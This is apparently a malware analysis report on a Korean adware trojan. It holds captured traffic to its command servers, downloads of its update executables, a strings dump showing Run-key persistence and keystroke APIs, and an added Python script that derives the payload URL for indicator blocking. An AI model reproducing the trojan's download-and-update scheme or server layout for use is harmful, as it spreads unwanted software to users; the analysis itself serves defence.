],tl=[u],ie=UTF-8,,|KOREA,ko,hXXp://search.naver.com,hXXp://search.naver.com/search.naver?query=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|GERMAN,de,hXXp://de.search.yahoo.com,hXXp://de.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|ENGLISH,en,hXXp://search.yahoo.com,http://search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|JAPAN,ja,hXXp://VVV.goog
<<
<<< skipped >>>
GET /config/keyword_platinum.asp?user_no=3207&SubName=MAIN HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.54
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSAQRDCRT=PMEIBMBABNLIGGHIDHENOBFG
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4784
Content-Type: text/html
Expires: Sat, 24 May 2014 06:16:20 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:19 GMT
[icon][/icon][startpage][/startpage][startpop][/startpop][popup][/popup][adminkeywordpop]N|1024*750|1|..........^±¤°Ã´ëÇà »ç^광고대։사 ###N|1024*750|2|..........^Ű¿öµå±¤°Ã^¤워드광고###N|1024*750|3|http:VVV.naver.com^http:naver.com ###N|1024*750|4|http:VVV.daum.net ###N|1024*750|5|http:kr.yahoo.com ###N|1024*750|6|http:VVV.paran.com ###N|1024*750|7|http:VVV.netmarble.net ###N|1024*750|8|http:VVV.gajai.com ###N|1024*750|9|http:VVV.korea.com^http:VVV.freechal.com^http:VVV.dreamwiz.com ###N|1024*750|10|http:VVV.chol.com^http:kr.msn.com^http:VVV.hanafos.com ###N|1024*750|11|http:VVV.imbc.com^http:VVV.chosun.com^http:VVV.sportsseoul.com^http:VVV.edaily.co.kr ###N|1024*750|12|http:VVV.soribada.com ###N|1024*750|13|http:VVV.hangame.com^http:VVV.sayclub.com ###N|1024*750|14|http:VVV.gmarket.co.kr^http:VVV.interpark.com ###N|1024*750|15|http:VVV.buddybuddy.co.kr ###N|1024*750|16|http:sample.naver.com^................ ###N|1024*750|17|http:zusoo.com^http:VVV.nuguni.com^http:VVV.emdb.co.kr^http:VVV.unitel.co.kr^http:VVV.totalplaza.com ###N|1024*750|18|http:VVV.tworld.co.kr^http:
<<
<<< skipped >>>
GET /Config/ipget.asp?kn=first&usd=3207&SubName=MAIN&preid=0&ver=sup&Version=1425 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.54
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSAQRDCRT=PMEIBMBABNLIGGHIDHENOBFG
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Sat, 24 May 2014 06:16:20 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:20 GMT
....
GET /Config/ipget.asp?kn=every&usd=3207&SubName=MAIN&preid=0&ver=sup&Version=1425 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.54
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSAQRDCRT=PMEIBMBABNLIGGHIDHENOBFG
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Sat, 24 May 2014 06:16:20 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:20 GMT
GET /Config/AdNw/StakePsList.asp?uno=3207 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: hostserver.kr
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAQRDCRT=KMEIBMBAKFAFIMNPPOFAEHIP; path=/
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:18 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..http://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..http://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..http://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..http://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..http://220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..http://220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://220.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://220.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.73.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73.162.61..
GET /Download/WinCtrCon.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.4
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 20 May 2014 05:11:20 GMT
Accept-Ranges: bytes
ETag: "b4d8bcefe973cf1:0"
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:13:19 GMT
Content-Length: 106016
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}...9...9...9.......8...P...?.......8...Rich9...........PE..L...J.zS.................P... .......!.......`....@.........................................................................$V..(....p.................. ...................................................(... ....................................text....O.......P.................. ..`.data........`.......`..............@....rsrc........p.......p..............@..@=..H............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<
<<< skipped >>>
GET /Config/AdNw/StakePsList.asp?uno=3207 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: hostserver.kr
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAQRDCRT=BEEIBMBAKNIENJHEGGLAKOCO; path=/
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:58 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..hXXp://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..hXXp://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..hXXp://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..hXXp://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..hXXp://220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..hXXp://220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://220.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://220.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.73.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73.162.61..
GET /Config/sTakeList.asp?n=3207 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: duzip.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQQBADQDD=FLBMFMBAHOIBJICLEMMMKHCG; path=/
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:42 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..hXXp://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..hXXp://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..hXXp://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..hXXp://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..hXXp://220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..hXXp://220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://220.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://220.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.73.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73.162.61..
GET /Download/WinCtrProc.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.2
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 21 May 2014 06:59:48 GMT
Accept-Ranges: bytes
ETag: "9bdb3441c274cf1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:12:32 GMT
Content-Length: 839208
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........MTK.,:..,:..,:.~04..,:..33..,:..37..,:.Rich.,:.................PE..L...[O|S.....................P......8r............@.............................................................................(.......................(...................................................0... ....................................text............................... ..`.data....5..........................@....rsrc...............................@..@=..H............MSVBVM60.DLL
<<
<<< skipped >>>
GET /Config/AdNw/FcTimeLab.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.24
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 159
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQAQTQSD=MJPPEMBALNBLNIODAIBKKEDI; path=/
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:28 GMT
5|5|60|hXXp://micronames.co.kr/Download,hXXp://220.73.162.2/Download,hXXp://220.73.162.3/Download,hXXp://220.73.162.4/Download|5|100|100||100|120|Y|Y|Y|Y|Y|Y......
GET /Config/NewConf/ProgramUpdateLab.asp?version=1425 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.24
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDAQAQTQSD=MJPPEMBALNBLNIODAIBKKEDI
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:31 GMT
1425|WinCtrProc.exe..
GET /Config/FormLocation.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.45
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5287
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSSBDATDC=ACAOHMBAGONCBDCJCKJNBAHD; path=/
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:50 GMT
hXXp://blink.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://cafe.naver.com/CafeRankingSectionList.nhn?|961|C|962|50|R|L|8|8|283#..hXXp://kin.naver.com/db/detail.php?|961|C|962|50|R|L|10|10|283#..hXXp://news.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://section.blog.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://sample.naver.com|781|C|870|260|R|L|12|12|255#..hXXp://weather.news.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://VVV.naver.com|882|C|882|260|R|L|6|6|255#..hXXp://agora.media.daum.net|978|C|58.34|900|R|L|9|9|430#..hXXp://agoraplaza.media.daum.net/petition/petition.do?|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/?|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/_blog/_top|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/_top/|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/_top/layout|978|C|58.34|900|R|L|9|9|430#..http://cafe.daum.net/_c21_/cafefocus_list?|978|C|58.34|900|R|L|9|9|430#..http://cafe.daum.net/_ranking/rank_top100_1.html?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/support/cafesupport.html?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/brand/brandstar.html?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/event/event_list.html?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/_bbs/0noti/bbs_read?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/?_top_blogtop=navi_cafehome|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/top/top.html?_top_cafetop=cafehome|978|C|58.34|900|R|L|9|9|430#..hXXp://cartoon.media.daum.net|978|C|58.34|900|R|L|9|9|430#..hXXp://issue.media.daum.ne
<<
<<< skipped >>>
GET /Config/AdNw/FcPimSLab.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.45
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSBDATDC=ACAOHMBAGONCBDCJCKJNBAHD
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 159
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:51 GMT
5|5|60|hXXp://micronames.co.kr/Download,hXXp://220.73.162.2/Download,hXXp://220.73.162.3/Download,hXXp://220.73.162.4/Download|5|100|100||100|120|Y|Y|Y|Y|Y|Y......
GET /Config/newConf/UCg_LPrMLab.asp?user_no=3207 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.45
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSBDATDC=ACAOHMBAGONCBDCJCKJNBAHD
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 396
Content-Type: text/html
Expires: Sat, 24 May 2014 06:15:52 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:51 GMT
KOREA|Y|N|N|Y|hXXp://kr.search.yahoo.com/search?fr=clickstory_kr_synd_search&ovt=A_P_AB_cityfriend_5&p=|Y|N|N|0|hXXp://220.73.162.58/config/LanguageTranslate.asp?hl=[u]&sl=[u]&tl=[1]&p=[KEYWORD]|name="p" value=,16|hXXp://kr.dictionary.search.yahoo.com/search/dictionaryp?subtype=[1]&prop=7&p=[KEYWORD]|50|N|N|N|0|hXXp://VVV.hebogo.com/search/csearch.asp|N|0|N|0|Y|N|N|N|N|Y|Y|Y|0|N|ALRIM|Y|N|N|N|....
GET /Config/TransSiteString.asp?nation=KOREA HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.45
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSBDATDC=ACAOHMBAGONCBDCJCKJNBAHD
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12071
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:52 GMT
KOREA,ko,hXXp://kr.search.yahoo.com,hXXp://kr.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|ENGLISH,en,hXXp://search.yahoo.com,hXXp://search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|CHINA,zh-TW,hXXp://one.cn.yahoo.com,hXXp://one.cn.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|CANADA,ca,hXXp://ca.search.yahoo.com,http://ca.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|GERMAN,de,hXXp://de.search.yahoo.com,hXXp://de.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|FRANCE,fr,http://fr.search.yahoo.com,hXXp://fr.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|JAPAN,ja,hXXp://VVV.yahoo.co.jp,hXXp://search.yahoo.co.jp/search?p=,http://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|KOREA,ko,hXXp://search.naver.com,hXXp://search.naver.com/search.naver?query=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|GERMAN,de,hXXp://de.search.yahoo.com,hXXp://de.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|ENGLISH,en,hXXp://search.yahoo.com,http://search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|JAPAN,ja,hXXp://VVV.goog
<<
<<< skipped >>>
GET /Download/WinCtrProc.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.2
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 21 May 2014 06:59:48 GMT
Accept-Ranges: bytes
ETag: "9bdb3441c274cf1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:12:13 GMT
Content-Length: 839208
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........MTK.,:..,:..,:.~04..,:..33..,:..37..,:.Rich.,:.................PE..L...[O|S.....................P......8r............@.............................................................................(.......................(...................................................0... ....................................text............................... ..`.data....5..........................@....rsrc...............................@..@=..H............MSVBVM60.DLL
<<
<<< skipped >>>
GET /Config/sTakeList.asp?n=3207 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: korserver.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCTBAQCB=ELBDJMBAOJDMCHFOOEOKPIGB; path=/
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:49 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..hXXp://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..hXXp://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..hXXp://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..hXXp://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..hXXp://220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..hXXp://220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://220.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://220.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.73.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73.162.61..
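The three replies above are enough to predict the download that follows them: StakePsList.asp / sTakeList.asp return a 40-address server list, FcTimeLab.asp carries a comma-separated mirror list in its fourth pipe-delimited field, and ProgramUpdateLab.asp answers a version number with "version|filename". The Python below is an added example, not part of the Lavasoft report or of the sample's own code. It rebuilds the reply bodies from the capture (the report prints CR LF as ".."), parses them, and checks that mirror list plus update filename yields exactly the GET /Download/WinCtrProc.exe to 220.73.162.2 that the capture shows next. Only those three fields are interpreted; every other field is kept raw because the capture does not reveal its meaning.

```python
"""Added example (not part of the Lavasoft report): parse the configuration
replies captured above and derive the payload URL the sample then fetched.
Only fields whose meaning is visible in the capture are interpreted (the
server list, the mirror list in field 3 of FcTimeLab.asp, and the
version|filename pair from ProgramUpdateLab.asp); the rest stay raw."""
import re

# Reply bodies reconstructed from the capture (".." in the report is CR LF).
# 40 entries joined by ",\r\n" is 917 bytes, matching the Content-Length seen.
SERVER_LIST_BODY = ",\r\n".join(f"hXXp://220.73.162.{n}" for n in range(22, 62))
FCTIME_BODY = ("5|5|60|hXXp://micronames.co.kr/Download,hXXp://220.73.162.2/Download,"
               "hXXp://220.73.162.3/Download,hXXp://220.73.162.4/Download"
               "|5|100|100||100|120|Y|Y|Y|Y|Y|Y\r\n")
UPDATE_BODY = "1425|WinCtrProc.exe\r\n"
# The request that followed in the capture: GET /Download/WinCtrProc.exe, Host: 220.73.162.2
OBSERVED_DOWNLOAD = ("220.73.162.2", "/Download/WinCtrProc.exe")

HOST_RE = re.compile(r"^(?:hXXp|http)://([^/,\s]+)")


def refang(s):
    """Undo the report's defanging so URLs compare byte-for-byte."""
    return s.replace("hXXp://", "http://").replace("VVV.", "www.")


def defang(s):
    """Re-apply the report's defanging before writing IOCs anywhere clickable."""
    return s.replace("http://", "hXXp://").replace("www.", "VVV.")


def parse_server_list(body):
    """One 'http://host,' entry per CR LF line -> ordered list of hosts."""
    hosts = []
    for line in body.splitlines():
        m = HOST_RE.match(line.strip())
        if m:
            hosts.append(m.group(1))
    return hosts


def parse_fctime(body):
    """Pipe-delimited; field 3 is a comma-separated list of download mirrors."""
    fields = body.strip().split("|")
    mirrors = [refang(m).rstrip("/") for m in fields[3].split(",") if m]
    return {"mirrors": mirrors, "raw_fields": fields}


def parse_update(body):
    """'version|filename' -> (int, str); the filename is what gets fetched."""
    version, filename = body.strip().split("|", 1)
    return int(version), filename


def candidate_downloads(mirrors, filename):
    """Every URL the client could build from the mirror list and the update name."""
    return [f"{m}/{filename}" for m in mirrors]


def explains_observed(candidates, observed=OBSERVED_DOWNLOAD):
    """True if the Host + path actually requested is one the config predicted."""
    host, path = observed
    return f"http://{host}{path}" in candidates


def all_hosts():
    """Every distinct host the three replies point at, sorted for an IOC list."""
    hosts = set(parse_server_list(SERVER_LIST_BODY))
    hosts |= {HOST_RE.match(m).group(1) for m in parse_fctime(FCTIME_BODY)["mirrors"]}
    return sorted(hosts)


if __name__ == "__main__":
    cfg = parse_fctime(FCTIME_BODY)
    version, filename = parse_update(UPDATE_BODY)
    cands = candidate_downloads(cfg["mirrors"], filename)
    print(f"update version {version}, predicted URLs: {[defang(c) for c in cands]}")
    print("observed download explained by config:", explains_observed(cands))
    print(f"{len(all_hosts())} distinct hosts in the replies")
```

The check `explains_observed` is the useful part for an analyst: it ties the otherwise opaque config replies to the binary that was actually dropped, so the mirror hosts can be blocked with the same confidence as the observed download host.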
Map
The Trojan connects to the servers at the following location(s) (Host headers and IP addresses observed in the captured traffic above):
hostserver.kr
duzip.com
korserver.com
220.73.162.2
220.73.162.24
220.73.162.45
Strings from Dumps
WinCtrProc.exe_2504:
.text
`.data
.rsrc
MSVBVM60.DLL
InetCtlsObjects.Inet
WebBrowser1
SHDocVwCtl.WebBrowser
vb6ko.dll
shdocvw.dll
WebBrowser
MSINET.OCX
KeywordForm
shell32.dll
ShellExecuteA
GetKeyState
EnumWindows
GetAsyncKeyState
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
1%System%\MSINET.oca
%System%\ieframe.oca
GetWindowsDirectoryA
UpdateLayeredWindows
User32.DLL
WSOCK32.DLL
vb6stkit.dll
GetKeyboardState
URLEncode
VBA6.DLL
advapi32.dll
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegOpenKeyExA
RegCreateKeyA
RegOpenKeyA
%System%\msvbvm60.dll\3
kernel32.dll
WinExec
2008:02:21 11:10:24
urlTEXT
MsgeTEXT
Hhttp://ns.adobe.com/xap/1.0/
<x:xapmeta xmlns:x="adobe:ns:meta/" x:xaptk="XMP toolkit 2.8.2-33, framework 1.5"></x:xapmeta>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:iX="http://ns.adobe.com/iX/1.0/"></rdf:RDF>
<rdf:Description about="uuid:25326700-e021-11dc-8e7f-a474304460f4">
xmlns:xapMM='http://ns.adobe.com/xap/1.0/mm/'>
<xapMM:DocumentID>adobe:docid:photoshop:253266fe-e021-11dc-8e7f-a474304460f4</xapMM:DocumentID>
http://
http:///
\WinApp\VoeyQdhGdowq\WinCtrPrc\WinFormProcess.vbp
78E1BDD1-9941-11cf-9756-00AA00C00908
http://micronames.co.kr/Download,http://220.73.162.2/Download,http://220.73.162.3/Download,http://220.73.162.4/Download
3.asp
2.asp
/config/formactive.asp?uno=
&url=
&keyword=
&keyno=
&kind=PORTAL
microsoft.com
/config/FormActive.asp?uno=
/config/FormActive_Distinct.asp?uno=
/config/Formactive_Distinct.asp?uno=
st.asp?uno=
&kind=KEYWORD
/Config/FormLocation.asp
/Config/AdNw/FcPimSLab.asp
/Config/newConf/UCg_LPrMLab.asp?user_no=
/Config/TransSiteString.asp?nation=
/Config/FileNameDataMicro.asp
SetDownValue.asp?uno=
software\microsoft\windows\currentversion\run
/Config/UrlEncodeDecode.asp?q=
/Config/MakeStartPage.asp?uno=
&key=
?keyword=
?key=
keyword=
/Config/MakeSearchPage.asp?uno=
/Config/MakeIcon.asp?uno=
[KEYWORD]
/Config/TargetDataConnect.asp?p=&uno=
/Config/MakeProgram.asp?uno=
%Program Files%\micrOLAb\SearchEngin\LanguageConvert
http://maketop.kr
/Config/ServerList.asp?uno=
http://korserver.com
http://koreaserver.kr
http://domainserver.co.kr
http://hostserver.kr
http://mainserver.kr
http://makevalue.com
http://duzip.com
http://itemprice.kr
2000-10-01
Software\Microsoft\Windows\currentversion\Run
Software\Microsoft\Windows\CurrentVersion\Run
http://azgogo.net/download
VB6KO.DLL
msvbvm60.dll
wshom.ocx
ERROR_URL
/advertisebanner/keyword/
/advertisedistinct/keyword/
InternetExplorer.Application
/Config/Pop_Key_MainPlatinum.asp?uno=
keyboard
/Config/Pop_Key_MainDistinct.asp?uno=
&distinct=keyword
error_url
http://www.naver.com
/Config/ipget.asp?kn=first&usd=
Windows 32s
Windows 95/98
Windows NT
/config/keyword_platinum.asp?user_no=
[adminkeywordpop]
[/adminkeywordpop]
[keywordpop]
[/keywordpop]
/Config/ipget.asp?kn=every&usd=
Software\Microsoft\Windows\Currentversion\Run
MicroProCon.exe
MicroProProc.exe
RetainPt.exe
RetainComp.exe
in.asp?uno=
Software\Microsoft\Windows\currentversion\run
00000001
00000060
.asp?version=
.asp?user_no=
.asp?uno=
Error getting subkey value.
/Config/GuideSiteString.asp?p=
.dictionary
dic.daum
dic.naver
dic.nate
http:
https:
로
을
e.asp?p=
.asp?p=
roLab.asp?p=
Code.asp?p=
https://
ode.asp?uno=
/Config/KeySt
ab.asp?p=
/Config/SiteLink_Code.asp?uno=
/Config/ConvertLanguagemicrOLAb.asp?p=
/Config/OvertureDataConnect.asp?p=&uno=
/Config/RankeyLink_Code.asp?uno=
/advertisebanner/keyword
/advertisedistinct/keyword
JOIN
KEYWORD
\Internet Explorer\iexplore.exe
WScript.Shell
%Program Files%\Internet Explorer\iexplore.exe
/Config/KeyStringmicrOLAbPop.asp?p=
wscript.shell
/Config/GolbalString.asp?p=
/Config/TransSiteString_Commit.asp?site=
/Config/FindBrowserCode.asp?p=
iexplorer.exe
PORTUGAL
from portugal
to portugal
opera
Error opening key.
firefox
chrome
mozilla
Chrome_OmniboxView
netpia.com
WinCtrProc.exe
